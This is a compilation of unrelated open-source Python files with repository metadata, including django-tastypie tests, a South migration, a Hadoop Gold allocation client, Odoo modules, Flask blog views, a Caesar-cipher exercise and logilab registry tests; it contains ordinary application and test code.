self.assertEqual(isinstance(subject_bundle_list[0], Bundle), True)
self.assertEqual(subject_bundle_list[0].data['name'], u'News')
self.assertEqual(subject_bundle_list[0].data['url'], u'/news/')
self.assertEqual(subject_bundle_list[0].obj.name, u'News')
self.assertEqual(subject_bundle_list[0].obj.url, u'/news/')
self.assertEqual(isinstance(subject_bundle_list[1], Bundle), True)
self.assertEqual(subject_bundle_list[1].data['name'], u'Photos')
self.assertEqual(subject_bundle_list[1].data['url'], u'/photos/')
self.assertEqual(subject_bundle_list[1].obj.name, u'Photos')
self.assertEqual(subject_bundle_list[1].obj.url, u'/photos/')
# list url with callable returning True
field_5 = ToManyField(SubjectResource, 'subjects', full=True, full_list=lambda x: True)
field_5.instance_name = 'm2m'
request = MockRequest()
request.path = "/api/v1/subjects/"
bundle_5 = Bundle(obj=self.note_1, request=request)
subject_bundle_list = field_5.dehydrate(bundle_5)
self.assertEqual(len(subject_bundle_list), 2)
self.assertEqual(isinstance(subject_bundle_list[0], Bundle), True)
self.assertEqual(subject_bundle_list[0].data['name'], u'News')
self.assertEqual(subject_bundle_list[0].data['url'], u'/news/')
self.assertEqual(subject_bundle_list[0].obj.name, u'News')
self.assertEqual(subject_bundle_list[0].obj.url, u'/news/')
self.assertEqual(isinstance(subject_bundle_list[1], Bundle), True)
self.assertEqual(subject_bundle_list[1].data['name'], u'Photos')
self.assertEqual(subject_bundle_list[1].data['url'], u'/photos/')
self.assertEqual(subject_bundle_list[1].obj.name, u'Photos')
self.assertEqual(subject_bundle_list[1].obj.url, u'/photos/')
# list url with callable returning False
field_6 = ToManyField(SubjectResource, 'subjects', full=True, full_list=lambda x: False)
field_6.instance_name = 'm2m'
request = MockRequest()
request.path = "/api/v1/subjects/"
bundle_6 = Bundle(obj=self.note_1, request=request)
self.assertEqual(field_6.dehydrate(bundle_6), ['/api/v1/subjects/1/', '/api/v1/subjects/2/'])
# detail url with callable returning True
field_7 = ToManyField(SubjectResource, 'subjects', full=True, full_detail=lambda x: True)
field_7.instance_name = 'm2m'
request = MockRequest()
request.path = "/api/v1/subjects/%(pk)s/" % {'pk': self.note_1.pk}
bundle_7 = Bundle(obj=self.note_1, request=request)
subject_bundle_list = field_7.dehydrate(bundle_7)
self.assertEqual(len(subject_bundle_list), 2)
self.assertEqual(isinstance(subject_bundle_list[0], Bundle), True)
self.assertEqual(subject_bundle_list[0].data['name'], u'News')
self.assertEqual(subject_bundle_list[0].data['url'], u'/news/')
self.assertEqual(subject_bundle_list[0].obj.name, u'News')
self.assertEqual(subject_bundle_list[0].obj.url, u'/news/')
self.assertEqual(isinstance(subject_bundle_list[1], Bundle), True)
self.assertEqual(subject_bundle_list[1].data['name'], u'Photos')
self.assertEqual(subject_bundle_list[1].data['url'], u'/photos/')
self.assertEqual(subject_bundle_list[1].obj.name, u'Photos')
self.assertEqual(subject_bundle_list[1].obj.url, u'/photos/')
# detail url with callable returning False
field_8 = ToManyField(SubjectResource, 'subjects', full=True, full_detail=lambda x: False)
field_8.instance_name = 'm2m'
request = MockRequest()
request.path = "/api/v1/subjects/%(pk)s/" % {'pk': self.note_1.pk}
bundle_8 = Bundle(obj=self.note_1, request=request)
self.assertEqual(field_8.dehydrate(bundle_8, for_list=False), ['/api/v1/subjects/1/', '/api/v1/subjects/2/'])
# detail url with full_detail=True and get parameters
field_9 = ToManyField(SubjectResource, 'subjects', full=True, full_detail=True)
field_9.instance_name = 'm2m'
request = HttpRequest()
request.method = "GET"
request.GET = {"foo": "bar"}
request.META["QUERY_STRING"] = "foo=bar"
request.path = "/api/v1/subjects/%(pk)s/" % {'pk': self.note_1.pk}
bundle_9 = Bundle(obj=self.note_1, request=request)
subject_bundle_list = field_9.dehydrate(bundle_9)
self.assertEqual(len(subject_bundle_list), 2)
self.assertEqual(isinstance(subject_bundle_list[0], Bundle), True)
self.assertEqual(subject_bundle_list[0].data['name'], u'News')
self.assertEqual(subject_bundle_list[0].data['url'], u'/news/')
self.assertEqual(subject_bundle_list[0].obj.name, u'News')
self.assertEqual(subject_bundle_list[0].obj.url, u'/news/')
self.assertEqual(isinstance(subject_bundle_list[1], Bundle), True)
self.assertEqual(subject_bundle_list[1].data['name'], u'Photos')
self.assertEqual(subject_bundle_list[1].data['url'], u'/photos/')
self.assertEqual(subject_bundle_list[1].obj.name, u'Photos')
self.assertEqual(subject_bundle_list[1].obj.url, u'/photos/')
def test_dehydrate_with_callable(self):
bundle_1 = Bundle(obj=self.note_2)
field_1 = ToManyField(SubjectResource, attribute=lambda bundle: Subject.objects.filter(notes=bundle.obj, name__startswith='Personal'))
field_1.instance_name = 'm2m'
self.assertEqual(field_1.dehydrate(bundle_1), ['/api/v1/subjects/3/'])
def test_hydrate(self):
note = Note.objects.get(pk=1)
bundle = Bundle(obj=note)
# With no value or nullable, we should get an ``ApiFieldError``.
field_1 = ToManyField(SubjectResource, 'subjects')
field_1.instance_name = 'm2m'
self.assertRaises(ApiFieldError, field_1.hydrate_m2m, bundle)
# The nullable case.
field_2 = ToManyField(SubjectResource, 'subjects', null=True)
field_2.instance_name = 'm2m'
empty_bundle = Bundle()
self.assertEqual(field_2.hydrate_m2m(empty_bundle), [])
field_3 = ToManyField(SubjectResource, 'subjects', null=True)
field_3.instance_name = 'm2m'
bundle_3 = Bundle(data={'m2m': []})
self.assertEqual(field_3.hydrate_m2m(bundle_3), [])
# Wrong resource URI.
field_4 = ToManyField(SubjectResource, 'subjects')
field_4.instance_name = 'm2m'
bundle_4 = Bundle(data={'m2m': ['/api/v1/subjects/abc/']})
self.assertRaises(NotFound, field_4.hydrate_m2m, bundle_4)
# A real, live attribute!
field_5 = ToManyField(SubjectResource, 'subjects')
field_5.instance_name = 'm2m'
bundle_5 = Bundle(data={'m2m': ['/api/v1/subjects/1/']})
subject_bundle_list = field_5.hydrate_m2m(bundle_5)
self.assertEqual(len(subject_bundle_list), 1)
self.assertEqual(subject_bundle_list[0].data['name'], u'News')
self.assertEqual(subject_bundle_list[0].data['url'], u'/news/')
self.assertEqual(subject_bundle_list[0].obj.name, u'News')
self.assertEqual(subject_bundle_list[0].obj.url, u'/news/')
field_6 = ToManyField(SubjectResource, 'subjects')
field_6.instance_name = 'm2m'
bundle_6 = Bundle(data={'m2m': [
{
'name': u'Foo',
'url': u'/foo/',
},
{
'name': u'Bar',
'url': u'/bar/',
},
]})
subject_bundle_list = field_6.hydrate_m2m(bundle_6)
self.assertEqual(len(subject_bundle_list), 2)
self.assertEqual(subject_bundle_list[0].data['name'], u'Foo')
self.assertEqual(subject_bundle_list[0].data['url'], u'/foo/')
self.assertEqual(subject_bundle_list[0].obj.name, u'Foo')
self.assertEqual(subject_bundle_list[0].obj.url, u'/foo/')
self.assertEqual(subject_bundle_list[1].data['name'], u'Bar')
self.assertEqual(subject_bundle_list[1].data['url'], u'/bar/')
self.assertEqual(subject_bundle_list[1].obj.name, u'Bar')
self.assertEqual(subject_bundle_list[1].obj.url, u'/bar/')
# The blank case.
field_7 = ToManyField(SubjectResource, 'fk', blank=True)
field_7.instance_name = 'fk'
self.assertEqual(field_7.hydrate(bundle_6), None)
field_8 = ToManyField(SubjectResource, 'm2m', blank=True)
field_8.instance_name = 'm2m'
subject_bundle_list_2 = field_8.hydrate_m2m(bundle_6)
self.assertEqual(len(subject_bundle_list_2), 2)
self.assertEqual(subject_bundle_list_2[0].data['name'], u'Foo')
self.assertEqual(subject_bundle_list_2[0].data['url'], u'/foo/')
self.assertEqual(subject_bundle_list_2[0].obj.name, u'Foo')
self.assertEqual(subject_bundle_list_2[0].obj.url, u'/foo/')
self.assertEqual(subject_bundle_list_2[1].data['name'], u'Bar')
self.assertEqual(subject_bundle_list_2[1].data['url'], u'/bar/')
self.assertEqual(subject_bundle_list_2[1].obj.name, u'Bar')
self.assertEqual(subject_bundle_list_2[1].obj.url, u'/bar/')
# The readonly case.
field_9 = ToManyField(SubjectResource, 'subjects', readonly=True)
field_9.instance_name = 'm2m'
self.assertEqual(field_9.hydrate(bundle_6), None)
# A related object.
field_10 = ToManyField(MediaBitResource, 'media_bits', related_name='note')
field_10.instance_name = 'mbs'
note_1 = Note.objects.get(pk=1)
bundle_10 = Bundle(obj=note_1, data={'mbs': [
{
'title': 'Foo!',
},
]})
media_bundle_list = field_10.hydrate_m2m(bundle_10)
self.assertEqual(len(media_bundle_list), 1)
self.assertEqual(media_bundle_list[0].obj.title, u'Foo!')
def test_traversed_attribute_dehydrate(self):
mediabit = MediaBit(id=1, note=self.note_1)
bundle = Bundle(obj=mediabit)
field_1 = ToManyField(SubjectResource, 'note__subjects')
field_1.instance_name = 'm2m'
self.assertEqual(field_1.dehydrate(bundle), ['/api/v1/subjects/1/', '/api/v1/subjects/2/'])
field_2 = ToOneField(SubjectResource, 'fakefield__subjects')
field_2.instance_name = 'm2m'
self.assertRaises(ApiFieldError, field_2.hydrate, bundle)
|
ocadotechnology/django-tastypie
|
tests/core/tests/fields.py
|
Python
|
bsd-3-clause
| 56,800 | 0.001268 |
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import DataMigration
from django.db import models
from django.contrib.gis.geos import geometry
from PIL import Image
from PIL.ExifTags import TAGS
from ..util import point_from_exif
class Migration(DataMigration):
def forwards(self, orm):
for photo in orm['photomap.Photo'].objects.all():
photo.location = point_from_exif(photo.image.path)
photo.save()
def backwards(self, orm):
raise NotImplementedError('Too lazy to write a method to write the'
' coordinates to the EXIF of the files')
models = {
u'photomap.photo': {
'Meta': {'object_name': 'Photo'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.files.ImageField', [], {'max_length': '100'}),
'location': ('django.contrib.gis.db.models.fields.PointField', [], {'null': 'True'})
}
}
complete_apps = ['photomap']
symmetrical = True
|
dschep/django-photomap
|
photomap/migrations/0004_copy_exif_data_to_model.py
|
Python
|
mit
| 1,128 | 0.003546 |
#Licensed to the Apache Software Foundation (ASF) under one
#or more contributor license agreements. See the NOTICE file
#distributed with this work for additional information
#regarding copyright ownership. The ASF licenses this file
#to you under the Apache License, Version 2.0 (the
#"License"); you may not use this file except in compliance
#with the License. You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#Unless required by applicable law or agreed to in writing, software
#distributed under the License is distributed on an "AS IS" BASIS,
#WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#See the License for the specific language governing permissions and
#limitations under the License.
"""Gold Allocation Manager Implementation"""
# -*- python -*-
import sys, httplib
import sha, base64, hmac
import xml.dom.minidom
from hodlib.Common.util import *
class goldAllocationManager:
def __init__(self, cfg, log):
self.__GOLD_SECRET_KEY_FILE = cfg['auth-file']
(self.__goldHost, self.__goldPort) = (cfg['allocation-manager-address'][0],
cfg['allocation-manager-address'][1])
self.cfg = cfg
self.log = log
def getQuote(self, user, project, ignoreErrors=True):
# Get Secret Key from File
secret = ''
try:
secretFile = open(self.__GOLD_SECRET_KEY_FILE)
secret = secretFile.readline()
except Exception, e:
self.log.error("Unable to open file %s" % self.__GOLD_SECRET_KEY_FILE)
self.log.debug(get_exception_string())
return (ignoreErrors or False)
secretFile.close()
secret = secret.rstrip()
# construct the SSRMAP request body
body = '<Body><Request action="Quote" actor="hod"><Object>Job</Object><Data><Job><ProjectId>%s</ProjectId><UserId>%s</UserId><WallDuration>10</WallDuration></Job></Data></Request></Body>' % (project, user)
# compute digest
message = sha.new()
message.update(body)
digest = message.digest()
digestStr = base64.b64encode(digest)
# compute signature
message = hmac.new(secret, digest, sha)
signatureStr = base64.b64encode(message.digest())
# construct the SSSRMAP Message
sssrmapRequest = '<?xml version="1.0" encoding="UTF-8"?>\
<Envelope>%s<Signature><DigestValue>%s</DigestValue><SignatureValue>%s</SignatureValue><SecurityToken type="Symmetric"></SecurityToken></Signature></Envelope>' % (body, digestStr, signatureStr)
self.log.info('sssrmapRequest: %s' % sssrmapRequest)
try:
# post message to GOLD server
webservice = httplib.HTTP(self.__goldHost, self.__goldPort)
webservice.putrequest("POST", "/SSSRMAP3 HTTP/1.1")
webservice.putheader("Content-Type", "text/xml; charset=\"utf-8\"")
webservice.putheader("Transfer-Encoding", "chunked")
webservice.endheaders()
webservice.send("%X" % len(sssrmapRequest) + "\r\n" + sssrmapRequest + '0\r\n')
# handle the response
statusCode, statusmessage, header = webservice.getreply()
responseStr = webservice.getfile().read()
self.log.debug("httpStatusCode: %d" % statusCode)
self.log.info('responseStr: %s' % responseStr)
# parse XML response
if (statusCode == 200):
responseArr = responseStr.split("\n")
responseBody = responseArr[2]
try:
doc = xml.dom.minidom.parseString(responseBody)
responseVal = doc.getElementsByTagName("Value")[0].firstChild.nodeValue
self.log.info("responseVal: %s" % responseVal)
if (responseVal == 'Success'):
return True
else:
return False
except Exception, e:
self.log.error("Unable to parse GOLD responseBody XML \"(%s)\" to get responseVal" % (responseBody))
self.log.debug(get_exception_string())
return (ignoreErrors or False)
else:
self.log.error("Invalid HTTP statusCode %d" % statusCode)
except Exception, e:
self.log.error("Unable to POST message to GOLD server (%s, %d)" %
(self.__goldHost, self.__goldPort))
self.log.debug(get_exception_string())
return (ignoreErrors or False)
return True
|
ZhangXFeng/hadoop
|
src/hadoop-mapreduce1-project/src/contrib/hod/hodlib/AllocationManagers/goldAllocationManager.py
|
Python
|
apache-2.0
| 4,244 | 0.013431 |
"""Tests for two-process terminal frontend
Currently only has the most simple test possible, starting a console and running
a single command.
Authors:
* Min RK
"""
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
import sys
import time
import nose.tools as nt
from nose import SkipTest
import IPython.testing.tools as tt
from IPython.testing import decorators as dec
from IPython.utils import py3compat
#-----------------------------------------------------------------------------
# Tests
#-----------------------------------------------------------------------------
@dec.skip_win32
def test_console_starts():
"""test that `ipython console` starts a terminal"""
from IPython.external import pexpect
args = ['console', '--colors=NoColor']
# FIXME: remove workaround for 2.6 support
if sys.version_info[:2] > (2,6):
args = ['-m', 'IPython'] + args
cmd = sys.executable
else:
cmd = 'ipython'
try:
p = pexpect.spawn(cmd, args=args)
except IOError:
raise SkipTest("Couldn't find command %s" % cmd)
# timeout after one minute
t = 60
idx = p.expect([r'In \[\d+\]', pexpect.EOF], timeout=t)
p.sendline('5')
idx = p.expect([r'Out\[\d+\]: 5', pexpect.EOF], timeout=t)
idx = p.expect([r'In \[\d+\]', pexpect.EOF], timeout=t)
# send ctrl-D;ctrl-D to exit
p.sendeof()
p.sendeof()
p.expect([pexpect.EOF, pexpect.TIMEOUT], timeout=t)
if p.isalive():
p.terminate()
def test_help_output():
"""ipython console --help-all works"""
tt.help_all_output_test('console')
|
noslenfa/tdjangorest
|
uw/lib/python2.7/site-packages/IPython/terminal/console/tests/test_console.py
|
Python
|
apache-2.0
| 1,726 | 0.006952 |
# coding: utf-8
"""
ORCID Member
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501
OpenAPI spec version: Latest
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
from orcid_api_v3.models.subtitle_v30_rc2 import SubtitleV30Rc2 # noqa: F401,E501
from orcid_api_v3.models.title_v30_rc2 import TitleV30Rc2 # noqa: F401,E501
from orcid_api_v3.models.translated_title_v30_rc2 import TranslatedTitleV30Rc2 # noqa: F401,E501
class WorkTitleV30Rc2(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'title': 'TitleV30Rc2',
'subtitle': 'SubtitleV30Rc2',
'translated_title': 'TranslatedTitleV30Rc2'
}
attribute_map = {
'title': 'title',
'subtitle': 'subtitle',
'translated_title': 'translated-title'
}
def __init__(self, title=None, subtitle=None, translated_title=None): # noqa: E501
"""WorkTitleV30Rc2 - a model defined in Swagger""" # noqa: E501
self._title = None
self._subtitle = None
self._translated_title = None
self.discriminator = None
if title is not None:
self.title = title
if subtitle is not None:
self.subtitle = subtitle
if translated_title is not None:
self.translated_title = translated_title
@property
def title(self):
"""Gets the title of this WorkTitleV30Rc2. # noqa: E501
:return: The title of this WorkTitleV30Rc2. # noqa: E501
:rtype: TitleV30Rc2
"""
return self._title
@title.setter
def title(self, title):
"""Sets the title of this WorkTitleV30Rc2.
:param title: The title of this WorkTitleV30Rc2. # noqa: E501
:type: TitleV30Rc2
"""
self._title = title
@property
def subtitle(self):
"""Gets the subtitle of this WorkTitleV30Rc2. # noqa: E501
:return: The subtitle of this WorkTitleV30Rc2. # noqa: E501
:rtype: SubtitleV30Rc2
"""
return self._subtitle
@subtitle.setter
def subtitle(self, subtitle):
"""Sets the subtitle of this WorkTitleV30Rc2.
:param subtitle: The subtitle of this WorkTitleV30Rc2. # noqa: E501
:type: SubtitleV30Rc2
"""
self._subtitle = subtitle
@property
def translated_title(self):
"""Gets the translated_title of this WorkTitleV30Rc2. # noqa: E501
:return: The translated_title of this WorkTitleV30Rc2. # noqa: E501
:rtype: TranslatedTitleV30Rc2
"""
return self._translated_title
@translated_title.setter
def translated_title(self, translated_title):
"""Sets the translated_title of this WorkTitleV30Rc2.
:param translated_title: The translated_title of this WorkTitleV30Rc2. # noqa: E501
:type: TranslatedTitleV30Rc2
"""
self._translated_title = translated_title
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(WorkTitleV30Rc2, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, WorkTitleV30Rc2):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
Royal-Society-of-New-Zealand/NZ-ORCID-Hub
|
orcid_api_v3/models/work_title_v30_rc2.py
|
Python
|
mit
| 4,930 | 0.000203 |
# Copyright 2021 Alfredo de la Fuente - Avanzosc S.L.
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl).
from odoo.tests import common
from odoo.tests import tagged
@tagged("post_install", "-at_install")
class TestNameCodeYearId(common.SavepointCase):
@classmethod
def setUpClass(cls):
super(TestNameCodeYearId, cls).setUpClass()
cls.event_obj = cls.env['event.event']
cls.skill_type_lang = cls.env.ref('hr_skills.hr_skill_type_lang')
cls.skill_spanish = cls.env.ref('hr_skills.hr_skill_spanish')
cls.skill_filipino = cls.env.ref('hr_skills.hr_skill_filipino')
cls.skill_type_lang.skill_language = True
cls.skill_spanish.code = 'SP'
cls.skill_filipino.code = 'FI'
def test_event_name_code_year_id(self):
vals = {'name': 'User for event lang level',
'date_begin': '2025-01-06 08:00:00',
'date_end': '2025-01-15 10:00:00',
'lang_id': self.skill_spanish.id}
event = self.event_obj.create(vals)
name = 'SP-{}-2025'.format(event.id)
self.assertEqual(event.name, name)
vals = {'date_begin': '2024-01-06 08:00:00',
'lang_id': self.skill_filipino.id}
event.write(vals)
name = 'FI-{}-2024'.format(event.id)
self.assertEqual(event.name, name)
|
avanzosc/odoo-addons
|
event_name_code_year_id/tests/test_event_name_code_year_id.py
|
Python
|
agpl-3.0
| 1,353 | 0 |
import traceback
from sqlalchemy import Column, Boolean, Integer, String, ForeignKey, create_engine
from sqlalchemy.orm import relationship, sessionmaker, scoped_session
from sqlalchemy.ext.declarative import declarative_base
Base = declarative_base()
engine = create_engine('sqlite:///bag_of_holding.db')
Base.metadata.bind = engine
session_factory = sessionmaker(bind=engine)
Session = scoped_session(session_factory)
session = Session()
class UserManager:
def build_db(self):
Base.metadata.create_all(engine)
def add_user(self, user_name):
"""
Create a new user
:return:
"""
def remove_user(self, user_name):
"""
Remove a current user
:param user_name:
:return:
"""
def add_user_profile(self, user_name, service_name):
"""
Add a service profile to a user_name
:param user_name:
:param service_name:
:return:
"""
def remove_user_profile(self, user_name, service_id):
"""
remove a service profile from a user_name
:param user_name:
:param service_id:
:return:
"""
def add_profile_trait(self, user_name, service_id, trait_name, trait_value):
"""
Add a trait to a service profile
:param user_name:
:param service_id:
:param trait_name
:param trait_value
:return:
"""
def remove_profile_trait(self, user_name, service_id, trait_id):
"""
Add a trait to a service profile
:param user_name:
:param service_id:
:param trait_id
:return:
"""
class User(Base):
__tablename__ = 'users'
id = Column(Integer, primary_key=True)
name = Column(String)
profiles = relationship('UserProfile')
def __repr__(self):
return '<User(id={})>'.format(self.id)
class UserProfile(Base):
__tablename__ = 'userprofiles'
id = Column(Integer, primary_key=True)
service_name = Column(String)
service_url = Column(String)
profile_id = Column(String)
user_id = Column(Integer, ForeignKey('user.id'))
def __repr__(self):
return '<UserProfile(id={}, service_name={}, service_url={}, profile_id={})>'\
.format(self.id, self.service_name, self.service_url, self.profile_id)
class ProfileTrait(Base):
__tablename__ = 'profiletraits'
id = Column(Integer, primary_key=True)
name = Column(String)
value = Column(String)
def __repr__(self):
return '<ProfileTrait(id={}, name={}, value={})>'.format(self.id, self.name, self.value)
|
gradiuscypher/internet_illithid
|
bag_of_holding/libs/user_manager.py
|
Python
|
mit
| 2,633 | 0.001899 |
def get_encrypted_char(k, ascii_val, ascii_list, limit):
diff = k % 26
rotate_val = ascii_val + diff
encrypted_char = ''
if rotate_val not in ascii_list:
rotate_val -= limit
for i in ascii_list:
rotate_val -= 1
if rotate_val == 0:
encrypted_char += chr(i)
else:
encrypted_char += chr(rotate_val)
return encrypted_char
def encrypt(s, k):
"""
a-z : 97-122
A-Z : 65-90
:param s: string to be encrypted
:param k: Integer, by which each character is rotated
:return: Encrypted string
"""
lower_ascii_list = [i for i in range(97, 123)]
upper_ascii_list = [i for i in range(65, 91)]
lower_case_limit = 122
upper_case_limit = 90
encrypted_string = str()
for c in s:
ascii_val = ord(c)
if ascii_val in lower_ascii_list or ascii_val in upper_ascii_list:
limit = lower_case_limit
ascii_list = lower_ascii_list
if ascii_val in upper_ascii_list:
limit = upper_case_limit
ascii_list = upper_ascii_list
encrypted_string += get_encrypted_char(k, ascii_val, ascii_list,
limit)
else:
encrypted_string += c
return encrypted_string
l = raw_input()
s = raw_input()
k = int(raw_input())
print encrypt(s, k)
|
spradeepv/dive-into-python
|
hackerrank/domain/algorithms/implementation/caesar_cipher/solution.py
|
Python
|
mit
| 1,399 | 0.002144 |
# -*- coding: utf-8 -*-
# © 2015 Compassion CH (Nicolas Tran)
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl.html).
from odoo import api, models
class AccountPaymentOrder(models.Model):
_inherit = 'account.payment.order'
@api.multi
def open2generated(self):
"""
Replace action to propose upload SEPA file to FDS.
:return: window action
"""
action = super(AccountPaymentOrder, self).open2generated()
if self.payment_method_id.code == 'sepa_credit_transfer':
upload_obj = self.env['payment.order.upload.sepa.wizard']
attachment_id = action['res_id']
upload_wizard = upload_obj.create({
'attachment_id': attachment_id,
'payment_order_id': self.id,
})
del action['view_id']
action.update({
'res_model': upload_obj._name,
'res_id': upload_wizard.id,
'flags': {'initial_mode': 'edit'},
'attachment_id': attachment_id
})
return action
|
CompassionCH/l10n-switzerland
|
l10n_ch_fds_upload_sepa/models/account_payment_order.py
|
Python
|
agpl-3.0
| 1,096 | 0 |
from flask import Blueprint, render_template, redirect, url_for
from flask_blog.extensions import mongo
from flask_blog.helpers import convertToObj
from flask.ext.login import login_required, current_user
from forms import PostsForm
posts = Blueprint('posts', __name__, template_folder='templates',
static_folder='static', static_url_path='/%s' % __name__)
@posts.route("/posts")
@login_required
def list():
posts = mongo.db.posts.find()
return render_template('posts_list.html', posts=posts)
@posts.route("/posts/add", methods=['GET', 'POST'])
@login_required
def add():
form = PostsForm()
if form.validate_on_submit():
mongo.db.posts.insert(_add_username(form.data))
return redirect(url_for("posts.list"))
return render_template('post_add.html', form=form)
@posts.route("/posts/get/<ObjectId:id>")
def get(id):
post = mongo.db.posts.find_one_or_404(id)
return render_template('post_get.html', post=post)
@posts.route("/posts/edit/<ObjectId:id>", methods=['GET', 'POST'])
@login_required
def edit(id):
post = mongo.db.posts.find_one_or_404(id)
form = PostsForm(obj=convertToObj(**post))
if form.validate_on_submit():
form.populate_obj(convertToObj(**post))
mongo.db.posts.update({'_id': id},
{'$set': form.data}
)
return redirect(url_for("posts.list"))
return render_template('post_edit.html', form=form, post=post)
@posts.route("/posts/delete/<ObjectId:id>")
@login_required
def delete(id):
mongo.db.posts.remove(id)
return redirect(url_for("posts.list"))
def _add_username(form):
post = form
post.update({"author": current_user.username})
return post
|
sboily/flask-blog
|
flask_blog/plugins/posts/views.py
|
Python
|
gpl-3.0
| 1,743 | 0.003442 |
# copyright 2003-2012 LOGILAB S.A. (Paris, FRANCE), all rights reserved.
# contact http://www.logilab.fr/ -- mailto:contact@logilab.fr
#
# This file is part of Logilab-Common.
#
# Logilab-Common is free software: you can redistribute it and/or modify it under the
# terms of the GNU Lesser General Public License as published by the Free
# Software Foundation, either version 2.1 of the License, or (at your option)
# any later version.
#
# Logilab-Common is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more
# details.
#
# You should have received a copy of the GNU Lesser General Public License along
# with Logilab-Common. If not, see <http://www.gnu.org/licenses/>.
"""unit tests for selectors mechanism"""
from __future__ import with_statement
import gc
import logging
import os.path as osp
import sys
from operator import eq, lt, le, gt
from contextlib import contextmanager
logging.basicConfig(level=logging.ERROR)
from logilab.common.testlib import TestCase, unittest_main
from logilab.common.registry import *
class _1_(Predicate):
def __call__(self, *args, **kwargs):
return 1
class _0_(Predicate):
def __call__(self, *args, **kwargs):
return 0
def _2_(*args, **kwargs):
return 2
class SelectorsTC(TestCase):
def test_basic_and(self):
selector = _1_() & _1_()
self.assertEqual(selector(None), 2)
selector = _1_() & _0_()
self.assertEqual(selector(None), 0)
selector = _0_() & _1_()
self.assertEqual(selector(None), 0)
def test_basic_or(self):
selector = _1_() | _1_()
self.assertEqual(selector(None), 1)
selector = _1_() | _0_()
self.assertEqual(selector(None), 1)
selector = _0_() | _1_()
self.assertEqual(selector(None), 1)
selector = _0_() | _0_()
self.assertEqual(selector(None), 0)
def test_selector_and_function(self):
selector = _1_() & _2_
self.assertEqual(selector(None), 3)
selector = _2_ & _1_()
self.assertEqual(selector(None), 3)
def test_three_and(self):
selector = _1_() & _1_() & _1_()
self.assertEqual(selector(None), 3)
selector = _1_() & _0_() & _1_()
self.assertEqual(selector(None), 0)
selector = _0_() & _1_() & _1_()
self.assertEqual(selector(None), 0)
def test_three_or(self):
selector = _1_() | _1_() | _1_()
self.assertEqual(selector(None), 1)
selector = _1_() | _0_() | _1_()
self.assertEqual(selector(None), 1)
selector = _0_() | _1_() | _1_()
self.assertEqual(selector(None), 1)
selector = _0_() | _0_() | _0_()
self.assertEqual(selector(None), 0)
def test_composition(self):
selector = (_1_() & _1_()) & (_1_() & _1_())
self.assertTrue(isinstance(selector, AndPredicate))
self.assertEqual(len(selector.selectors), 4)
self.assertEqual(selector(None), 4)
selector = (_1_() & _0_()) | (_1_() & _1_())
self.assertTrue(isinstance(selector, OrPredicate))
self.assertEqual(len(selector.selectors), 2)
self.assertEqual(selector(None), 2)
def test_search_selectors(self):
sel = _1_()
self.assertIs(sel.search_selector(_1_), sel)
csel = AndPredicate(sel, Predicate())
self.assertIs(csel.search_selector(_1_), sel)
csel = AndPredicate(Predicate(), sel)
self.assertIs(csel.search_selector(_1_), sel)
self.assertIs(csel.search_selector((AndPredicate, OrPredicate)), csel)
self.assertIs(csel.search_selector((OrPredicate, AndPredicate)), csel)
self.assertIs(csel.search_selector((_1_, _0_)), sel)
self.assertIs(csel.search_selector((_0_, _1_)), sel)
def test_inplace_and(self):
selector = _1_()
selector &= _1_()
selector &= _1_()
self.assertEqual(selector(None), 3)
selector = _1_()
selector &= _0_()
selector &= _1_()
self.assertEqual(selector(None), 0)
selector = _0_()
selector &= _1_()
selector &= _1_()
self.assertEqual(selector(None), 0)
selector = _0_()
selector &= _0_()
selector &= _0_()
self.assertEqual(selector(None), 0)
def test_inplace_or(self):
selector = _1_()
selector |= _1_()
selector |= _1_()
self.assertEqual(selector(None), 1)
selector = _1_()
selector |= _0_()
selector |= _1_()
self.assertEqual(selector(None), 1)
selector = _0_()
selector |= _1_()
selector |= _1_()
self.assertEqual(selector(None), 1)
selector = _0_()
selector |= _0_()
selector |= _0_()
self.assertEqual(selector(None), 0)
def test_wrap_selectors(self):
class _temp_(Predicate):
def __call__(self, *args, **kwargs):
return 0
del _temp_ # test weakref
s1 = _1_() & _1_()
s2 = _1_() & _0_()
s3 = _0_() & _1_()
gc.collect()
self.count = 0
def decorate(f, self=self):
def wrapper(*args, **kwargs):
self.count += 1
return f(*args, **kwargs)
return wrapper
wrap_predicates(decorate)
self.assertEqual(s1(None), 2)
self.assertEqual(s2(None), 0)
self.assertEqual(s3(None), 0)
self.assertEqual(self.count, 8)
@contextmanager
def prepended_syspath(path):
sys.path.insert(0, path)
yield
sys.path = sys.path[1:]
class RegistryStoreTC(TestCase):
def test_autoload(self):
store = RegistryStore()
store.setdefault('zereg')
with prepended_syspath(self.datadir):
store.register_objects([self.datapath('regobjects.py'),
self.datapath('regobjects2.py')])
